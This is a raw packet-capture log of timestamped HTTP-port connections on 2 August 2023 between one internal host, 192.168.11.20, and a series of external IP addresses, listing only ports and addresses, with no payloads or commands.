Aug 2, 2023 20:35:21.967061996 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.967091084 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967117071 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.967139959 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967139959 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967171907 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.967195988 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967228889 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.967358112 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967358112 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967358112 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.084465027 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084567070 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084636927 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084702969 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084705114 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.084768057 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084829092 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.084835052 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084902048 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.084911108 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.084969044 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085031033 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085031986 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085036993 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085108995 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085171938 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085175037 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085280895 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085304022 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085350990 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085355997 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085421085 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085484982 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085496902 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085547924 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085553885 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085612059 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085670948 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085675001 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085727930 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085728884 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085740089 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085804939 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085867882 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085908890 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085908890 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085932016 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.085974932 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.085995913 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.086060047 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.086107016 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086107016 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086122990 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.086173058 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086188078 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.086256027 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.086288929 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086288929 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086354971 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.086425066 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.199441910 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199536085 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199605942 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199671030 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199703932 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.199736118 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199763060 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.199801922 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199862003 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.199872017 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199907064 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.199939013 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.199954987 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200004101 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200107098 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200174093 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200247049 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200268030 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200310946 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200347900 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200375080 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200438976 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200464964 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200464964 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200501919 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200530052 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200566053 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200660944 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200660944 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200726986 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200726032 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200740099 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200748920 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200813055 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200901985 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200918913 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200918913 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200918913 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200934887 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.200994015 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.200999975 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201064110 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201111078 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201111078 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201127052 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201175928 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201235056 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201251030 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201292992 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201293945 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201314926 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201379061 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201442003 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201462984 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201463938 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201503992 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201529980 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201529980 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201569080 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.201582909 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201662064 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.201714039 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.324613094 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.324707031 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.324773073 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.324837923 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.324902058 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.324965954 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325031996 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325095892 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325159073 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325222015 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325289011 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325336933 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325337887 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325352907 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325417995 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325481892 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325525045 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325546026 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325582027 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325615883 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325679064 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325712919 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325742960 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325769901 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325808048 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325870991 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325896025 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325934887 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.325972080 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.325999022 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326064110 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326127052 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326126099 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326126099 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326189995 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326253891 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326317072 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326324940 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326324940 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326324940 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326380968 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326421022 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326447010 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326458931 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326509953 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326574087 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326597929 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326597929 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326637030 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326700926 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326765060 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326773882 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326773882 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326828003 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326841116 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326842070 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326893091 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326945066 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:22.326981068 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.326982021 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:22.327167988 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:26.728940964 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:26.729382992 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:34.823951006 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:45.517097950 CEST	49818	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:35:45.531688929 CEST	80	49818	67.27.158.126	192.168.11.20
Aug 2, 2023 20:35:45.531824112 CEST	49818	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:35:48.626720905 CEST	49674	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:35:48.642018080 CEST	80	49674	67.27.158.126	192.168.11.20
Aug 2, 2023 20:35:48.642147064 CEST	49674	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:35:49.578676939 CEST	49680	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:35:49.593895912 CEST	80	49680	67.27.158.126	192.168.11.20
Aug 2, 2023 20:35:49.594063044 CEST	49680	80	192.168.11.20	67.27.158.126
Aug 2, 2023 20:36:06.539514065 CEST	49867	80	192.168.11.20	199.188.104.120
Aug 2, 2023 20:36:06.692708015 CEST	80	49867	199.188.104.120	192.168.11.20
Aug 2, 2023 20:36:06.692982912 CEST	49867	80	192.168.11.20	199.188.104.120
Aug 2, 2023 20:36:06.692982912 CEST	49867	80	192.168.11.20	199.188.104.120
Aug 2, 2023 20:36:06.846332073 CEST	80	49867	199.188.104.120	192.168.11.20
Aug 2, 2023 20:36:06.853930950 CEST	80	49867	199.188.104.120	192.168.11.20
Aug 2, 2023 20:36:06.854016066 CEST	80	49867	199.188.104.120	192.168.11.20
Aug 2, 2023 20:36:06.854479074 CEST	49867	80	192.168.11.20	199.188.104.120
Aug 2, 2023 20:36:06.854480028 CEST	49867	80	192.168.11.20	199.188.104.120
Aug 2, 2023 20:36:07.007975101 CEST	80	49867	199.188.104.120	192.168.11.20
Aug 2, 2023 20:36:27.197973967 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.206511021 CEST	80	49869	104.17.157.1	192.168.11.20
Aug 2, 2023 20:36:27.206794024 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.206857920 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.215276957 CEST	80	49869	104.17.157.1	192.168.11.20
Aug 2, 2023 20:36:27.226452112 CEST	80	49869	104.17.157.1	192.168.11.20
Aug 2, 2023 20:36:27.226571083 CEST	80	49869	104.17.157.1	192.168.11.20
Aug 2, 2023 20:36:27.226800919 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.226800919 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.539022923 CEST	49869	80	192.168.11.20	104.17.157.1
Aug 2, 2023 20:36:27.547363043 CEST	80	49869	104.17.157.1	192.168.11.20
Aug 2, 2023 20:36:48.181452990 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.343090057 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:36:48.343362093 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.343466043 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.505354881 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:36:48.509077072 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:36:48.509139061 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:36:48.509471893 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.509471893 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.518430948 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:36:48.518611908 CEST	49871	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:36:48.671194077 CEST	80	49871	107.148.132.46	192.168.11.20
Aug 2, 2023 20:37:10.212397099 CEST	49873	80	192.168.11.20	52.76.96.91
Aug 2, 2023 20:37:10.364717007 CEST	80	49873	52.76.96.91	192.168.11.20
Aug 2, 2023 20:37:10.365118027 CEST	49873	80	192.168.11.20	52.76.96.91
Aug 2, 2023 20:37:10.365400076 CEST	49873	80	192.168.11.20	52.76.96.91
Aug 2, 2023 20:37:10.517530918 CEST	80	49873	52.76.96.91	192.168.11.20
Aug 2, 2023 20:37:10.517613888 CEST	80	49873	52.76.96.91	192.168.11.20
Aug 2, 2023 20:37:10.517669916 CEST	80	49873	52.76.96.91	192.168.11.20
Aug 2, 2023 20:37:10.518073082 CEST	49873	80	192.168.11.20	52.76.96.91
Aug 2, 2023 20:37:10.518073082 CEST	49873	80	192.168.11.20	52.76.96.91
Aug 2, 2023 20:37:10.670285940 CEST	80	49873	52.76.96.91	192.168.11.20
Aug 2, 2023 20:37:29.330070019 CEST	49874	80	192.168.11.20	198.252.102.187
Aug 2, 2023 20:37:29.462692976 CEST	80	49874	198.252.102.187	192.168.11.20
Aug 2, 2023 20:37:29.462945938 CEST	49874	80	192.168.11.20	198.252.102.187
Aug 2, 2023 20:37:29.463073969 CEST	49874	80	192.168.11.20	198.252.102.187
Aug 2, 2023 20:37:29.595366955 CEST	80	49874	198.252.102.187	192.168.11.20
Aug 2, 2023 20:37:29.595817089 CEST	80	49874	198.252.102.187	192.168.11.20
Aug 2, 2023 20:37:29.595859051 CEST	80	49874	198.252.102.187	192.168.11.20
Aug 2, 2023 20:37:29.596107006 CEST	49874	80	192.168.11.20	198.252.102.187
Aug 2, 2023 20:37:29.596107006 CEST	49874	80	192.168.11.20	198.252.102.187
Aug 2, 2023 20:37:29.728457928 CEST	80	49874	198.252.102.187	192.168.11.20
Aug 2, 2023 20:37:50.042249918 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.212141037 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.212440014 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.212547064 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.382271051 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383443117 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383543968 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383626938 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383687973 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383742094 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.383780956 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383855104 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.383881092 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.383933067 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:37:50.384032965 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.384222031 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.384283066 CEST	49875	80	192.168.11.20	107.148.83.209
Aug 2, 2023 20:37:50.553973913 CEST	80	49875	107.148.83.209	192.168.11.20
Aug 2, 2023 20:38:10.590611935 CEST	49877	80	192.168.11.20	188.114.97.14
Aug 2, 2023 20:38:10.599348068 CEST	80	49877	188.114.97.14	192.168.11.20
Aug 2, 2023 20:38:10.599500895 CEST	49877	80	192.168.11.20	188.114.97.14
Aug 2, 2023 20:38:10.599622965 CEST	49877	80	192.168.11.20	188.114.97.14
Aug 2, 2023 20:38:10.608191013 CEST	80	49877	188.114.97.14	192.168.11.20
Aug 2, 2023 20:38:11.110152006 CEST	49877	80	192.168.11.20	188.114.97.14
Aug 2, 2023 20:38:11.119112015 CEST	80	49877	188.114.97.14	192.168.11.20
Aug 2, 2023 20:38:11.119272947 CEST	49877	80	192.168.11.20	188.114.97.14
Aug 2, 2023 20:38:31.437972069 CEST	49878	80	192.168.11.20	45.77.219.226
Aug 2, 2023 20:38:31.526170969 CEST	80	49878	45.77.219.226	192.168.11.20
Aug 2, 2023 20:38:31.526443005 CEST	49878	80	192.168.11.20	45.77.219.226
Aug 2, 2023 20:38:31.526546001 CEST	49878	80	192.168.11.20	45.77.219.226
Aug 2, 2023 20:38:31.614801884 CEST	80	49878	45.77.219.226	192.168.11.20
Aug 2, 2023 20:38:31.614872932 CEST	80	49878	45.77.219.226	192.168.11.20
Aug 2, 2023 20:38:31.614921093 CEST	80	49878	45.77.219.226	192.168.11.20
Aug 2, 2023 20:38:31.615322113 CEST	49878	80	192.168.11.20	45.77.219.226
Aug 2, 2023 20:38:31.615323067 CEST	49878	80	192.168.11.20	45.77.219.226
Aug 2, 2023 20:38:31.703602076 CEST	80	49878	45.77.219.226	192.168.11.20
Aug 2, 2023 20:39:12.160526037 CEST	49881	80	192.168.11.20	185.238.87.6
Aug 2, 2023 20:39:12.203032017 CEST	80	49881	185.238.87.6	192.168.11.20
Aug 2, 2023 20:39:12.203303099 CEST	49881	80	192.168.11.20	185.238.87.6
Aug 2, 2023 20:39:12.203403950 CEST	49881	80	192.168.11.20	185.238.87.6
Aug 2, 2023 20:39:12.246170044 CEST	80	49881	185.238.87.6	192.168.11.20
Aug 2, 2023 20:39:12.246273994 CEST	80	49881	185.238.87.6	192.168.11.20
Aug 2, 2023 20:39:12.246339083 CEST	80	49881	185.238.87.6	192.168.11.20
Aug 2, 2023 20:39:12.246704102 CEST	49881	80	192.168.11.20	185.238.87.6
Aug 2, 2023 20:39:12.246704102 CEST	49881	80	192.168.11.20	185.238.87.6
Aug 2, 2023 20:39:12.289072037 CEST	80	49881	185.238.87.6	192.168.11.20
Aug 2, 2023 20:39:53.016428947 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:39:53.024983883 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.025137901 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:39:53.025229931 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:39:53.033600092 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051467896 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051506042 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051534891 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051562071 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051588058 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051609039 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051630020 CEST	80	49883	23.227.38.65	192.168.11.20
Aug 2, 2023 20:39:53.051680088 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:39:53.051805973 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:39:53.051867962 CEST	49883	80	192.168.11.20	23.227.38.65
Aug 2, 2023 20:40:13.669193983 CEST	49884	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:40:13.680655003 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:13.680866957 CEST	49884	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:40:13.680946112 CEST	49884	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:40:13.693027020 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:13.875751972 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:13.875868082 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:13.875956059 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:13.876243114 CEST	49884	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:40:13.876307011 CEST	49884	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:40:13.888221979 CEST	80	49884	199.59.243.224	192.168.11.20
Aug 2, 2023 20:40:36.164676905 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.330149889 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.330413103 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.330481052 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.781248093 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.843842983 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.946387053 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.948260069 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.948326111 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.948517084 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.948565006 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.948848963 CEST	80	49885	38.53.14.66	192.168.11.20
